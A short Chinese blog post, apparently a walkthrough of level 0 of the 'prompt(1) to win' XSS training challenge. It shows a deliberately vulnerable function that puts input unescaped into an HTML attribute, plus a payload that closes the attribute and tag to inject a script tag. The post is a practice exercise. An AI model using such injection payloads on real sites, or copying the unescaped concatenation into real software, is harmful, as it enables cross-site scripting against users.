【prompt(1) to win】 Level 0 - warm up



题目

function escape(input) {
    // warm up
    // script should be executed without user interaction
    return '<input type="text" value="' + input + '">';
}

解题报告

水题。直接闭合双引号和标签即可注入。

payload : "><script>prompt(1)</script>


答案下载


文章作者: EXP
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
  目录